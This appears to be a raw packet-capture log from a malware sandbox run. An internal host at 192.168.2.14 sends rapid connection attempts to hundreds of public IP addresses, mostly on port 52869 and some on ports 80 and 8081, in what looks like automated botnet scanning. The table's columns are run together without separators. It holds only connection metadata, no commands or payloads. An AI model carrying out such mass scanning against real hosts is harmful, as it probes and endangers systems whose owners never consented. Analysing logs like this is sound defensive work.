                                                Jul 20, 2024 23:05:33.026789904 CEST528692696640.240.151.255192.168.2.14
                                                Jul 20, 2024 23:05:33.026910067 CEST528692696684.123.244.5192.168.2.14
                                                Jul 20, 2024 23:05:33.026915073 CEST5286926966136.173.91.221192.168.2.14
                                                Jul 20, 2024 23:05:33.027021885 CEST528692696687.218.42.227192.168.2.14
                                                Jul 20, 2024 23:05:33.027124882 CEST528692696685.179.25.160192.168.2.14
                                                Jul 20, 2024 23:05:33.027256966 CEST528692696634.16.243.35192.168.2.14
                                                Jul 20, 2024 23:05:33.027436972 CEST528692696654.211.251.193192.168.2.14
                                                Jul 20, 2024 23:05:33.027622938 CEST528692696657.80.12.166192.168.2.14
                                                Jul 20, 2024 23:05:33.027760029 CEST528692696634.182.221.255192.168.2.14
                                                Jul 20, 2024 23:05:33.027761936 CEST2696652869192.168.2.14114.27.90.125
                                                Jul 20, 2024 23:05:33.027761936 CEST2696652869192.168.2.1417.155.188.80
                                                Jul 20, 2024 23:05:33.027761936 CEST2696652869192.168.2.14157.53.17.116
                                                Jul 20, 2024 23:05:33.027761936 CEST2696652869192.168.2.14192.84.172.109
                                                Jul 20, 2024 23:05:33.027761936 CEST2747880192.168.2.14112.237.88.133
                                                Jul 20, 2024 23:05:33.027761936 CEST2747880192.168.2.14112.235.214.37
                                                Jul 20, 2024 23:05:33.027761936 CEST2747880192.168.2.14112.250.98.247
                                                Jul 20, 2024 23:05:33.027761936 CEST2747880192.168.2.14112.165.1.157
                                                Jul 20, 2024 23:05:33.028048992 CEST5286926966105.32.69.188192.168.2.14
                                                Jul 20, 2024 23:05:33.028084040 CEST528692696663.214.72.31192.168.2.14
                                                Jul 20, 2024 23:05:33.028251886 CEST52869269669.239.190.228192.168.2.14
                                                Jul 20, 2024 23:05:33.028314114 CEST2696652869192.168.2.14139.226.83.186
                                                Jul 20, 2024 23:05:33.028314114 CEST2696652869192.168.2.14202.160.76.31
                                                Jul 20, 2024 23:05:33.028314114 CEST2696652869192.168.2.1450.118.92.33
                                                Jul 20, 2024 23:05:33.028314114 CEST2696652869192.168.2.1467.43.77.87
                                                Jul 20, 2024 23:05:33.028314114 CEST2696652869192.168.2.1446.35.195.231
                                                Jul 20, 2024 23:05:33.028314114 CEST2696652869192.168.2.1423.150.255.136
                                                Jul 20, 2024 23:05:33.028314114 CEST2696652869192.168.2.14158.89.94.200
                                                Jul 20, 2024 23:05:33.028314114 CEST2696652869192.168.2.1444.155.252.216
                                                Jul 20, 2024 23:05:33.028378963 CEST5286926966216.96.148.35192.168.2.14
                                                Jul 20, 2024 23:05:33.028383970 CEST528692696635.140.139.234192.168.2.14
                                                Jul 20, 2024 23:05:33.028827906 CEST5286926966132.199.182.97192.168.2.14
                                                Jul 20, 2024 23:05:33.028832912 CEST5286926966181.227.103.57192.168.2.14
                                                Jul 20, 2024 23:05:33.028837919 CEST5286926966107.160.177.153192.168.2.14
                                                Jul 20, 2024 23:05:33.028850079 CEST528692696689.64.229.183192.168.2.14
                                                Jul 20, 2024 23:05:33.028976917 CEST5286926966155.220.126.86192.168.2.14
                                                Jul 20, 2024 23:05:33.029213905 CEST2696652869192.168.2.14110.7.210.131
                                                Jul 20, 2024 23:05:33.029213905 CEST2696652869192.168.2.1470.217.44.207
                                                Jul 20, 2024 23:05:33.029213905 CEST2696652869192.168.2.14131.215.87.177
                                                Jul 20, 2024 23:05:33.029213905 CEST2696652869192.168.2.142.146.189.137
                                                Jul 20, 2024 23:05:33.029213905 CEST2696652869192.168.2.1445.25.153.64
                                                Jul 20, 2024 23:05:33.029213905 CEST2696652869192.168.2.14117.59.127.46
                                                Jul 20, 2024 23:05:33.029213905 CEST2696652869192.168.2.149.38.18.146
                                                Jul 20, 2024 23:05:33.029213905 CEST2696652869192.168.2.14183.19.109.104
                                                Jul 20, 2024 23:05:33.029330015 CEST5286926966128.128.79.184192.168.2.14
                                                Jul 20, 2024 23:05:33.029335022 CEST52869269661.239.9.16192.168.2.14
                                                Jul 20, 2024 23:05:33.029339075 CEST5286926966134.9.122.61192.168.2.14
                                                Jul 20, 2024 23:05:33.029356956 CEST5286926966211.126.2.5192.168.2.14
                                                Jul 20, 2024 23:05:33.029593945 CEST5286926966164.28.24.30192.168.2.14
                                                Jul 20, 2024 23:05:33.029598951 CEST5286926966106.93.34.236192.168.2.14
                                                Jul 20, 2024 23:05:33.029635906 CEST5286926966173.228.241.145192.168.2.14
                                                Jul 20, 2024 23:05:33.029854059 CEST528692696679.107.84.232192.168.2.14
                                                Jul 20, 2024 23:05:33.029859066 CEST5286926966165.197.19.94192.168.2.14
                                                Jul 20, 2024 23:05:33.029997110 CEST2696652869192.168.2.1459.227.4.98
                                                Jul 20, 2024 23:05:33.029997110 CEST2696652869192.168.2.14126.143.144.129
                                                Jul 20, 2024 23:05:33.029997110 CEST2696652869192.168.2.14135.69.52.22
                                                Jul 20, 2024 23:05:33.029997110 CEST2696652869192.168.2.14207.16.112.177
                                                Jul 20, 2024 23:05:33.029997110 CEST2696652869192.168.2.1477.198.66.150
                                                Jul 20, 2024 23:05:33.029997110 CEST2696652869192.168.2.14197.172.132.134
                                                Jul 20, 2024 23:05:33.029997110 CEST2696652869192.168.2.1494.121.100.248
                                                Jul 20, 2024 23:05:33.029997110 CEST2696652869192.168.2.1479.66.81.25
                                                Jul 20, 2024 23:05:33.030064106 CEST528692696664.0.134.204192.168.2.14
                                                Jul 20, 2024 23:05:33.030108929 CEST2696652869192.168.2.14177.202.204.36
                                                Jul 20, 2024 23:05:33.030108929 CEST2696652869192.168.2.14204.122.18.165
                                                Jul 20, 2024 23:05:33.030108929 CEST2696652869192.168.2.14150.167.82.189
                                                Jul 20, 2024 23:05:33.030108929 CEST2696652869192.168.2.14217.19.170.218
                                                Jul 20, 2024 23:05:33.030108929 CEST2696652869192.168.2.14122.63.220.231
                                                Jul 20, 2024 23:05:33.030108929 CEST2696652869192.168.2.14115.31.91.124
                                                Jul 20, 2024 23:05:33.030108929 CEST2696652869192.168.2.1449.166.109.138
                                                Jul 20, 2024 23:05:33.030108929 CEST2696652869192.168.2.1452.30.218.53
                                                Jul 20, 2024 23:05:33.030246019 CEST5286926966179.164.186.218192.168.2.14
                                                Jul 20, 2024 23:05:33.030399084 CEST2696652869192.168.2.1472.95.53.29
                                                Jul 20, 2024 23:05:33.030399084 CEST2696652869192.168.2.14199.21.210.243
                                                Jul 20, 2024 23:05:33.030399084 CEST2696652869192.168.2.1492.203.112.37
                                                Jul 20, 2024 23:05:33.030399084 CEST2696652869192.168.2.148.95.15.157
                                                Jul 20, 2024 23:05:33.030399084 CEST2696652869192.168.2.14188.192.144.176
                                                Jul 20, 2024 23:05:33.030400038 CEST2696652869192.168.2.1477.216.153.235
                                                Jul 20, 2024 23:05:33.030400038 CEST2696652869192.168.2.1493.224.251.65
                                                Jul 20, 2024 23:05:33.030400038 CEST2696652869192.168.2.14168.228.231.83
                                                Jul 20, 2024 23:05:33.030415058 CEST5286926966137.233.169.50192.168.2.14
                                                Jul 20, 2024 23:05:33.030474901 CEST528692696643.17.220.252192.168.2.14
                                                Jul 20, 2024 23:05:33.030618906 CEST5286926966210.239.174.13192.168.2.14
                                                Jul 20, 2024 23:05:33.030683041 CEST528692696681.33.209.177192.168.2.14
                                                Jul 20, 2024 23:05:33.030782938 CEST2747880192.168.2.14112.59.215.61
                                                Jul 20, 2024 23:05:33.030782938 CEST2747880192.168.2.14112.111.5.7
                                                Jul 20, 2024 23:05:33.030782938 CEST2747880192.168.2.14112.7.255.30
                                                Jul 20, 2024 23:05:33.030782938 CEST2747880192.168.2.14112.152.211.59
                                                Jul 20, 2024 23:05:33.030782938 CEST2747880192.168.2.14112.3.242.188
                                                Jul 20, 2024 23:05:33.030782938 CEST2747880192.168.2.14112.25.206.218
                                                Jul 20, 2024 23:05:33.030782938 CEST2747880192.168.2.14112.44.253.82
                                                Jul 20, 2024 23:05:33.030782938 CEST2747880192.168.2.14112.250.17.253
                                                Jul 20, 2024 23:05:33.030793905 CEST528692696672.99.131.245192.168.2.14
                                                Jul 20, 2024 23:05:33.030821085 CEST528692696652.235.163.97192.168.2.14
                                                Jul 20, 2024 23:05:33.030957937 CEST5286926966211.75.101.6192.168.2.14
                                                Jul 20, 2024 23:05:33.030975103 CEST528692696663.64.228.61192.168.2.14
                                                Jul 20, 2024 23:05:33.031167030 CEST5286926966188.231.197.28192.168.2.14
                                                Jul 20, 2024 23:05:33.031188011 CEST2696652869192.168.2.1496.147.106.209
                                                Jul 20, 2024 23:05:33.031188011 CEST2696652869192.168.2.1423.225.57.49
                                                Jul 20, 2024 23:05:33.031188011 CEST2696652869192.168.2.1423.95.209.242
                                                Jul 20, 2024 23:05:33.031188011 CEST2696652869192.168.2.1441.41.58.134
                                                Jul 20, 2024 23:05:33.031188011 CEST2696652869192.168.2.1485.65.41.215
                                                Jul 20, 2024 23:05:33.031188011 CEST2696652869192.168.2.1498.157.200.55
                                                Jul 20, 2024 23:05:33.031188011 CEST2696652869192.168.2.14147.24.68.232
                                                Jul 20, 2024 23:05:33.031306028 CEST5286926966140.37.208.12192.168.2.14
                                                Jul 20, 2024 23:05:33.031410933 CEST2696652869192.168.2.1424.157.233.219
                                                Jul 20, 2024 23:05:33.031410933 CEST2696652869192.168.2.14208.165.87.80
                                                Jul 20, 2024 23:05:33.031410933 CEST2696652869192.168.2.14192.194.56.10
                                                Jul 20, 2024 23:05:33.031410933 CEST2696652869192.168.2.14125.72.138.76
                                                Jul 20, 2024 23:05:33.031410933 CEST2696652869192.168.2.1487.121.74.188
                                                Jul 20, 2024 23:05:33.031410933 CEST2696652869192.168.2.14180.186.160.26
                                                Jul 20, 2024 23:05:33.031410933 CEST2696652869192.168.2.14134.178.15.155
                                                Jul 20, 2024 23:05:33.031410933 CEST2696652869192.168.2.14158.77.24.127
                                                Jul 20, 2024 23:05:33.031418085 CEST5286926966203.56.117.87192.168.2.14
                                                Jul 20, 2024 23:05:33.031482935 CEST528692696624.174.103.14192.168.2.14
                                                Jul 20, 2024 23:05:33.031518936 CEST5286926966195.58.12.108192.168.2.14
                                                Jul 20, 2024 23:05:33.031682968 CEST5286926966201.231.16.57192.168.2.14
                                                Jul 20, 2024 23:05:33.031735897 CEST528692696695.131.13.41192.168.2.14
                                                Jul 20, 2024 23:05:33.031866074 CEST5286926966198.144.40.88192.168.2.14
                                                Jul 20, 2024 23:05:33.031871080 CEST5286926966216.7.65.228192.168.2.14
                                                Jul 20, 2024 23:05:33.032232046 CEST5286926966119.247.205.195192.168.2.14
                                                Jul 20, 2024 23:05:33.032356977 CEST2696652869192.168.2.1434.249.74.137
                                                Jul 20, 2024 23:05:33.032356977 CEST267108081192.168.2.14223.180.173.76
                                                Jul 20, 2024 23:05:33.032356977 CEST2696652869192.168.2.14187.140.79.68
                                                Jul 20, 2024 23:05:33.032356977 CEST2696652869192.168.2.14161.40.243.96
                                                Jul 20, 2024 23:05:33.032356977 CEST2696652869192.168.2.14149.11.140.219
                                                Jul 20, 2024 23:05:33.032356977 CEST2696652869192.168.2.14178.148.241.110
                                                Jul 20, 2024 23:05:33.032356977 CEST2696652869192.168.2.14173.166.204.159
                                                Jul 20, 2024 23:05:33.032356977 CEST2696652869192.168.2.1481.169.73.77
                                                Jul 20, 2024 23:05:33.032361984 CEST528692696669.114.150.243192.168.2.14
                                                Jul 20, 2024 23:05:33.032531023 CEST5286926966125.45.195.184192.168.2.14
                                                Jul 20, 2024 23:05:33.032639980 CEST5286926966196.146.29.209192.168.2.14
                                                Jul 20, 2024 23:05:33.032861948 CEST528692696659.150.30.0192.168.2.14
                                                Jul 20, 2024 23:05:33.032949924 CEST528692696638.111.238.210192.168.2.14
                                                Jul 20, 2024 23:05:33.033319950 CEST2696652869192.168.2.14156.2.219.15
                                                Jul 20, 2024 23:05:33.033319950 CEST2696652869192.168.2.1498.235.63.122
                                                Jul 20, 2024 23:05:33.033319950 CEST2696652869192.168.2.1462.72.98.253
                                                Jul 20, 2024 23:05:33.033319950 CEST2696652869192.168.2.14137.85.222.73
                                                Jul 20, 2024 23:05:33.033319950 CEST2696652869192.168.2.14133.176.188.67
                                                Jul 20, 2024 23:05:33.033319950 CEST2696652869192.168.2.1486.79.14.115
                                                Jul 20, 2024 23:05:33.033320904 CEST2696652869192.168.2.1498.123.162.170
                                                Jul 20, 2024 23:05:33.033320904 CEST2696652869192.168.2.14140.45.124.85
                                                Jul 20, 2024 23:05:33.033438921 CEST2747880192.168.2.14112.166.160.4
                                                Jul 20, 2024 23:05:33.033438921 CEST2747880192.168.2.14112.77.46.224
                                                Jul 20, 2024 23:05:33.033438921 CEST2747880192.168.2.14112.109.198.251
                                                Jul 20, 2024 23:05:33.033438921 CEST2747880192.168.2.14112.0.202.93
                                                Jul 20, 2024 23:05:33.033438921 CEST2747880192.168.2.14112.251.200.107
                                                Jul 20, 2024 23:05:33.033438921 CEST2747880192.168.2.14112.76.17.207
                                                Jul 20, 2024 23:05:33.033438921 CEST2747880192.168.2.14112.126.224.249
                                                Jul 20, 2024 23:05:33.033440113 CEST2747880192.168.2.14112.105.158.0
                                                Jul 20, 2024 23:05:33.033607006 CEST5286926966168.136.146.42192.168.2.14
                                                Jul 20, 2024 23:05:33.034301996 CEST5286926966103.5.63.70192.168.2.14
                                                Jul 20, 2024 23:05:33.034307957 CEST528692696623.74.134.184192.168.2.14
                                                Jul 20, 2024 23:05:33.034326077 CEST528692696672.61.200.94192.168.2.14
                                                Jul 20, 2024 23:05:33.034331083 CEST5286926966137.241.27.168192.168.2.14
                                                Jul 20, 2024 23:05:33.034339905 CEST5286926966110.7.210.131192.168.2.14
                                                Jul 20, 2024 23:05:33.034344912 CEST528692696670.217.44.207192.168.2.14
                                                Jul 20, 2024 23:05:33.034349918 CEST5286926966117.181.194.56192.168.2.14
                                                Jul 20, 2024 23:05:33.034445047 CEST5286926966150.146.100.84192.168.2.14
                                                Jul 20, 2024 23:05:33.034610033 CEST8027478112.237.88.133192.168.2.14
                                                Jul 20, 2024 23:05:33.034708977 CEST528692696618.16.141.95192.168.2.14
                                                Jul 20, 2024 23:05:33.034776926 CEST2696652869192.168.2.14166.147.34.14
                                                Jul 20, 2024 23:05:33.034776926 CEST2696652869192.168.2.14206.102.43.209
                                                Jul 20, 2024 23:05:33.034776926 CEST2696652869192.168.2.14101.89.39.240
                                                Jul 20, 2024 23:05:33.034776926 CEST2696652869192.168.2.14205.58.123.5
                                                Jul 20, 2024 23:05:33.034776926 CEST2696652869192.168.2.14153.27.251.6
                                                Jul 20, 2024 23:05:33.034776926 CEST2696652869192.168.2.14153.187.111.58
                                                Jul 20, 2024 23:05:33.034776926 CEST2696652869192.168.2.1452.21.33.116
                                                Jul 20, 2024 23:05:33.034776926 CEST2696652869192.168.2.14197.172.172.172
                                                Jul 20, 2024 23:05:33.034785986 CEST528692696620.132.88.148192.168.2.14
                                                Jul 20, 2024 23:05:33.034995079 CEST8027478112.235.214.37192.168.2.14
                                                Jul 20, 2024 23:05:33.035048008 CEST528692696639.136.210.188192.168.2.14
                                                Jul 20, 2024 23:05:33.035217047 CEST528692696641.248.198.22192.168.2.14
                                                Jul 20, 2024 23:05:33.035465956 CEST2696652869192.168.2.14205.182.183.38
                                                Jul 20, 2024 23:05:33.035465956 CEST2696652869192.168.2.1413.166.35.40
                                                Jul 20, 2024 23:05:33.035465956 CEST2696652869192.168.2.14193.165.230.105
                                                Jul 20, 2024 23:05:33.035465956 CEST2696652869192.168.2.1471.111.183.5
                                                Jul 20, 2024 23:05:33.035465956 CEST2696652869192.168.2.1444.81.138.53
                                                Jul 20, 2024 23:05:33.035465956 CEST2696652869192.168.2.1474.136.186.209
                                                Jul 20, 2024 23:05:33.035465956 CEST2696652869192.168.2.1499.70.90.213
                                                Jul 20, 2024 23:05:33.035465956 CEST2696652869192.168.2.14180.219.129.185
                                                Jul 20, 2024 23:05:33.035486937 CEST8027478112.250.98.247192.168.2.14
                                                Jul 20, 2024 23:05:33.035491943 CEST5286926966131.215.87.177192.168.2.14
                                                Jul 20, 2024 23:05:33.035531998 CEST8027478112.165.1.157192.168.2.14
                                                Jul 20, 2024 23:05:33.035537004 CEST52869269662.146.189.137192.168.2.14
                                                Jul 20, 2024 23:05:33.035635948 CEST2696652869192.168.2.14192.47.114.54
                                                Jul 20, 2024 23:05:33.035635948 CEST2696652869192.168.2.14142.184.113.112
                                                Jul 20, 2024 23:05:33.035635948 CEST2696652869192.168.2.14184.149.167.202
                                                Jul 20, 2024 23:05:33.035635948 CEST2696652869192.168.2.1452.157.156.150
                                                Jul 20, 2024 23:05:33.035636902 CEST2696652869192.168.2.142.81.241.245
                                                Jul 20, 2024 23:05:33.035636902 CEST2696652869192.168.2.14201.202.56.103
                                                Jul 20, 2024 23:05:33.035640001 CEST8027478112.59.215.61192.168.2.14
                                                Jul 20, 2024 23:05:33.035934925 CEST2696652869192.168.2.1414.22.27.23
                                                Jul 20, 2024 23:05:33.035934925 CEST2696652869192.168.2.14158.147.68.236
                                                Jul 20, 2024 23:05:33.035934925 CEST2696652869192.168.2.1471.89.218.142
                                                Jul 20, 2024 23:05:33.035934925 CEST2696652869192.168.2.1437.14.240.76
                                                Jul 20, 2024 23:05:33.035934925 CEST2696652869192.168.2.1413.187.64.178
                                                Jul 20, 2024 23:05:33.035934925 CEST2696652869192.168.2.14154.122.243.243
                                                Jul 20, 2024 23:05:33.035934925 CEST2696652869192.168.2.14198.80.200.245
                                                Jul 20, 2024 23:05:33.035934925 CEST2696652869192.168.2.14120.166.190.85
                                                Jul 20, 2024 23:05:33.036737919 CEST2696652869192.168.2.141.90.234.200
                                                Jul 20, 2024 23:05:33.036737919 CEST2696652869192.168.2.14175.118.93.38
                                                Jul 20, 2024 23:05:33.036737919 CEST2696652869192.168.2.14149.68.156.54
                                                Jul 20, 2024 23:05:33.036737919 CEST2696652869192.168.2.14163.117.175.205
                                                Jul 20, 2024 23:05:33.036737919 CEST2696652869192.168.2.14206.246.225.132
                                                Jul 20, 2024 23:05:33.036739111 CEST437868081192.168.2.14216.109.199.249
                                                Jul 20, 2024 23:05:33.036904097 CEST2747880192.168.2.14112.12.65.114
                                                Jul 20, 2024 23:05:33.036904097 CEST2747880192.168.2.14112.41.70.47
                                                Jul 20, 2024 23:05:33.036904097 CEST2747880192.168.2.14112.202.119.210
                                                Jul 20, 2024 23:05:33.036904097 CEST2747880192.168.2.14112.237.88.133
                                                Jul 20, 2024 23:05:33.036904097 CEST2747880192.168.2.14112.235.214.37
                                                Jul 20, 2024 23:05:33.036904097 CEST2747880192.168.2.14112.250.98.247
                                                Jul 20, 2024 23:05:33.036905050 CEST2747880192.168.2.14112.165.1.157
                                                Jul 20, 2024 23:05:33.036905050 CEST2747880192.168.2.14112.59.215.61
                                                Jul 20, 2024 23:05:33.036983967 CEST8027478112.111.5.7192.168.2.14
                                                Jul 20, 2024 23:05:33.036989927 CEST5286926966104.205.79.210192.168.2.14
                                                Jul 20, 2024 23:05:33.036994934 CEST5286926966122.47.93.115192.168.2.14
                                                Jul 20, 2024 23:05:33.037060976 CEST8027478112.7.255.30192.168.2.14
                                                Jul 20, 2024 23:05:33.037065029 CEST5286926966166.113.82.7192.168.2.14
                                                Jul 20, 2024 23:05:33.037070036 CEST528692696659.227.4.98192.168.2.14
                                                Jul 20, 2024 23:05:33.037075043 CEST528692696645.25.153.64192.168.2.14
                                                Jul 20, 2024 23:05:33.037084103 CEST8027478112.152.211.59192.168.2.14
                                                Jul 20, 2024 23:05:33.037170887 CEST8027478112.3.242.188192.168.2.14
                                                Jul 20, 2024 23:05:33.037175894 CEST5286926966222.13.99.58192.168.2.14
                                                Jul 20, 2024 23:05:33.037180901 CEST5286926966126.143.144.129192.168.2.14
                                                Jul 20, 2024 23:05:33.037218094 CEST528692696624.157.233.219192.168.2.14
                                                Jul 20, 2024 23:05:33.037228107 CEST5286926966133.67.22.194192.168.2.14
                                                Jul 20, 2024 23:05:33.037233114 CEST5286926966208.165.87.80192.168.2.14
                                                Jul 20, 2024 23:05:33.037246943 CEST5286926966135.69.52.22192.168.2.14
                                                Jul 20, 2024 23:05:33.037343979 CEST8027478112.25.206.218192.168.2.14
                                                Jul 20, 2024 23:05:33.037517071 CEST5286926966207.16.112.177192.168.2.14
                                                Jul 20, 2024 23:05:33.037547112 CEST5286926966117.59.127.46192.168.2.14
                                                Jul 20, 2024 23:05:33.037714005 CEST8027478112.44.253.82192.168.2.14
                                                Jul 20, 2024 23:05:33.037724018 CEST528692696677.198.66.150192.168.2.14
                                                Jul 20, 2024 23:05:33.037766933 CEST528692696634.249.74.137192.168.2.14
                                                Jul 20, 2024 23:05:33.038566113 CEST2696652869192.168.2.14149.251.173.44
                                                Jul 20, 2024 23:05:33.038566113 CEST2696652869192.168.2.14199.99.77.62
                                                Jul 20, 2024 23:05:33.038566113 CEST2696652869192.168.2.14177.74.46.3
                                                Jul 20, 2024 23:05:33.038566113 CEST2696652869192.168.2.14192.10.66.34
                                                Jul 20, 2024 23:05:33.038566113 CEST2696652869192.168.2.14205.103.39.252
                                                Jul 20, 2024 23:05:33.038566113 CEST2696652869192.168.2.14114.191.174.224
                                                Jul 20, 2024 23:05:33.038566113 CEST2696652869192.168.2.1445.2.194.198
                                                Jul 20, 2024 23:05:33.038566113 CEST2696652869192.168.2.1495.83.251.218
                                                Jul 20, 2024 23:05:33.038758039 CEST2696652869192.168.2.1420.52.77.90
                                                Jul 20, 2024 23:05:33.038758039 CEST2696652869192.168.2.1493.186.22.134
                                                Jul 20, 2024 23:05:33.038758039 CEST2696652869192.168.2.1460.197.58.124
                                                Jul 20, 2024 23:05:33.038758039 CEST2696652869192.168.2.14135.108.16.139
                                                Jul 20, 2024 23:05:33.038758993 CEST2696652869192.168.2.14103.218.223.55
                                                Jul 20, 2024 23:05:33.038758993 CEST2696652869192.168.2.14125.141.51.132
                                                Jul 20, 2024 23:05:33.038758993 CEST2696652869192.168.2.14204.215.23.245
                                                Jul 20, 2024 23:05:33.038758993 CEST2696652869192.168.2.14149.53.194.2
                                                Jul 20, 2024 23:05:33.038961887 CEST52869269669.38.18.146192.168.2.14
                                                Jul 20, 2024 23:05:33.039139986 CEST2696652869192.168.2.14221.44.49.191
                                                Jul 20, 2024 23:05:33.039139986 CEST2696652869192.168.2.14106.161.107.174
                                                Jul 20, 2024 23:05:33.039139986 CEST2696652869192.168.2.14126.142.95.126
                                                Jul 20, 2024 23:05:33.039139986 CEST2696652869192.168.2.14184.74.255.124
                                                Jul 20, 2024 23:05:33.039139986 CEST2696652869192.168.2.14195.74.127.147
                                                Jul 20, 2024 23:05:33.039139986 CEST2696652869192.168.2.14104.118.231.142
                                                Jul 20, 2024 23:05:33.039139986 CEST2696652869192.168.2.14146.164.63.62
                                                Jul 20, 2024 23:05:33.039139986 CEST2696652869192.168.2.14144.71.235.64
                                                Jul 20, 2024 23:05:33.039402962 CEST2696652869192.168.2.14196.188.124.94
                                                Jul 20, 2024 23:05:33.039402962 CEST2696652869192.168.2.14100.224.111.212
                                                Jul 20, 2024 23:05:33.039402962 CEST2696652869192.168.2.14153.211.181.166
                                                Jul 20, 2024 23:05:33.039402962 CEST2696652869192.168.2.14140.35.141.240
                                                Jul 20, 2024 23:05:33.039402962 CEST2696652869192.168.2.14103.170.30.125
                                                Jul 20, 2024 23:05:33.039402962 CEST2696652869192.168.2.14169.163.82.134
                                                Jul 20, 2024 23:05:33.039402962 CEST2696652869192.168.2.14125.13.107.158
                                                Jul 20, 2024 23:05:33.039402962 CEST2696652869192.168.2.14122.0.86.210
                                                Jul 20, 2024 23:05:33.039573908 CEST5286926966183.19.109.104192.168.2.14
                                                Jul 20, 2024 23:05:33.039578915 CEST8027478112.250.17.253192.168.2.14
                                                Jul 20, 2024 23:05:33.039702892 CEST2696652869192.168.2.14108.14.43.116
                                                Jul 20, 2024 23:05:33.039702892 CEST267108081192.168.2.1462.255.143.253
                                                Jul 20, 2024 23:05:33.039910078 CEST5286926966192.194.56.10192.168.2.14
                                                Jul 20, 2024 23:05:33.040091991 CEST2696652869192.168.2.1467.188.108.237
                                                Jul 20, 2024 23:05:33.040091991 CEST2696652869192.168.2.14130.236.30.251
                                                Jul 20, 2024 23:05:33.040091991 CEST2696652869192.168.2.1479.93.9.114
                                                Jul 20, 2024 23:05:33.040091991 CEST2696652869192.168.2.14191.75.149.205
                                                Jul 20, 2024 23:05:33.040091991 CEST2696652869192.168.2.14178.218.35.30
                                                Jul 20, 2024 23:05:33.040091991 CEST2696652869192.168.2.14174.128.117.38
                                                Jul 20, 2024 23:05:33.040091991 CEST2696652869192.168.2.14134.225.104.121
                                                Jul 20, 2024 23:05:33.040091991 CEST2696652869192.168.2.1488.119.154.59
                                                Jul 20, 2024 23:05:33.040533066 CEST2696652869192.168.2.14211.127.230.111
                                                Jul 20, 2024 23:05:33.040533066 CEST2696652869192.168.2.14178.111.133.26
                                                Jul 20, 2024 23:05:33.040533066 CEST2696652869192.168.2.14186.130.210.50
                                                Jul 20, 2024 23:05:33.040533066 CEST2696652869192.168.2.14103.221.230.248
                                                Jul 20, 2024 23:05:33.040533066 CEST2696652869192.168.2.14201.119.244.156
                                                Jul 20, 2024 23:05:33.040533066 CEST2696652869192.168.2.14195.50.250.15
                                                Jul 20, 2024 23:05:33.040533066 CEST2696652869192.168.2.1490.220.223.3
                                                Jul 20, 2024 23:05:33.040533066 CEST2696652869192.168.2.1440.10.56.22
                                                Jul 20, 2024 23:05:33.040787935 CEST2747880192.168.2.14112.111.5.7
                                                Jul 20, 2024 23:05:33.040787935 CEST2747880192.168.2.14112.7.255.30
                                                Jul 20, 2024 23:05:33.040787935 CEST2747880192.168.2.14112.152.211.59
                                                Jul 20, 2024 23:05:33.040787935 CEST2747880192.168.2.14112.3.242.188
                                                Jul 20, 2024 23:05:33.040787935 CEST2747880192.168.2.14112.25.206.218
                                                Jul 20, 2024 23:05:33.040787935 CEST2747880192.168.2.14112.44.253.82
                                                Jul 20, 2024 23:05:33.040788889 CEST2747880192.168.2.14112.250.17.253
                                                Jul 20, 2024 23:05:33.041297913 CEST5286926966197.172.132.134192.168.2.14
                                                Jul 20, 2024 23:05:33.041621923 CEST2696652869192.168.2.14211.117.157.193
                                                Jul 20, 2024 23:05:33.041621923 CEST2696652869192.168.2.1454.31.236.168
                                                Jul 20, 2024 23:05:33.041621923 CEST2696652869192.168.2.1463.196.54.142
                                                Jul 20, 2024 23:05:33.041621923 CEST2696652869192.168.2.14219.136.199.61
                                                Jul 20, 2024 23:05:33.041621923 CEST2696652869192.168.2.1453.53.33.68
                                                Jul 20, 2024 23:05:33.041621923 CEST2696652869192.168.2.14197.8.224.198
                                                Jul 20, 2024 23:05:33.042145014 CEST2696652869192.168.2.14164.51.134.130
                                                Jul 20, 2024 23:05:33.042145014 CEST2696652869192.168.2.1473.89.251.240
                                                Jul 20, 2024 23:05:33.042145014 CEST2696652869192.168.2.1451.124.135.151
                                                Jul 20, 2024 23:05:33.042145014 CEST2696652869192.168.2.1474.222.41.173
                                                Jul 20, 2024 23:05:33.042145014 CEST2696652869192.168.2.14123.231.226.219
                                                Jul 20, 2024 23:05:33.042145967 CEST2696652869192.168.2.14100.138.218.213
                                                Jul 20, 2024 23:05:33.042145967 CEST2696652869192.168.2.14209.157.35.177
                                                Jul 20, 2024 23:05:33.042145967 CEST2696652869192.168.2.14116.183.119.0
                                                Jul 20, 2024 23:05:33.042252064 CEST8027478112.166.160.4192.168.2.14
                                                Jul 20, 2024 23:05:33.042258024 CEST5286926966125.72.138.76192.168.2.14
                                                Jul 20, 2024 23:05:33.042263031 CEST528692696687.121.74.188192.168.2.14
                                                Jul 20, 2024 23:05:33.042284966 CEST528692696694.121.100.248192.168.2.14
                                                Jul 20, 2024 23:05:33.042294979 CEST8027478112.77.46.224192.168.2.14
                                                Jul 20, 2024 23:05:33.042299032 CEST5286926966156.2.219.15192.168.2.14
                                                Jul 20, 2024 23:05:33.042303085 CEST5286926966180.186.160.26192.168.2.14
                                                Jul 20, 2024 23:05:33.042308092 CEST528692696679.66.81.25192.168.2.14
                                                Jul 20, 2024 23:05:33.042318106 CEST8027478112.109.198.251192.168.2.14
                                                Jul 20, 2024 23:05:33.042331934 CEST528692696698.235.63.122192.168.2.14
                                                Jul 20, 2024 23:05:33.042335987 CEST8027478112.0.202.93192.168.2.14
                                                Jul 20, 2024 23:05:33.042340040 CEST5286926966134.178.15.155192.168.2.14
                                                Jul 20, 2024 23:05:33.042345047 CEST5286926966166.147.34.14192.168.2.14
                                                Jul 20, 2024 23:05:33.042350054 CEST528692696662.72.98.253192.168.2.14
                                                Jul 20, 2024 23:05:33.042354107 CEST5286926966137.85.222.73192.168.2.14
                                                Jul 20, 2024 23:05:33.042370081 CEST5286926966158.77.24.127192.168.2.14
                                                Jul 20, 2024 23:05:33.042375088 CEST5286926966133.176.188.67192.168.2.14
                                                Jul 20, 2024 23:05:33.042378902 CEST8027478112.251.200.107192.168.2.14
                                                Jul 20, 2024 23:05:33.042383909 CEST8027478112.76.17.207192.168.2.14
                                                Jul 20, 2024 23:05:33.042532921 CEST5286926966187.140.79.68192.168.2.14
                                                Jul 20, 2024 23:05:33.042536974 CEST528692696686.79.14.115192.168.2.14
                                                Jul 20, 2024 23:05:33.042541981 CEST8027478112.126.224.249192.168.2.14
                                                Jul 20, 2024 23:05:33.042597055 CEST2696652869192.168.2.1466.217.30.236
                                                Jul 20, 2024 23:05:33.042597055 CEST2696652869192.168.2.1435.208.190.118
                                                Jul 20, 2024 23:05:33.042597055 CEST2696652869192.168.2.1468.158.128.201
                                                Jul 20, 2024 23:05:33.042597055 CEST2696652869192.168.2.14190.139.114.178
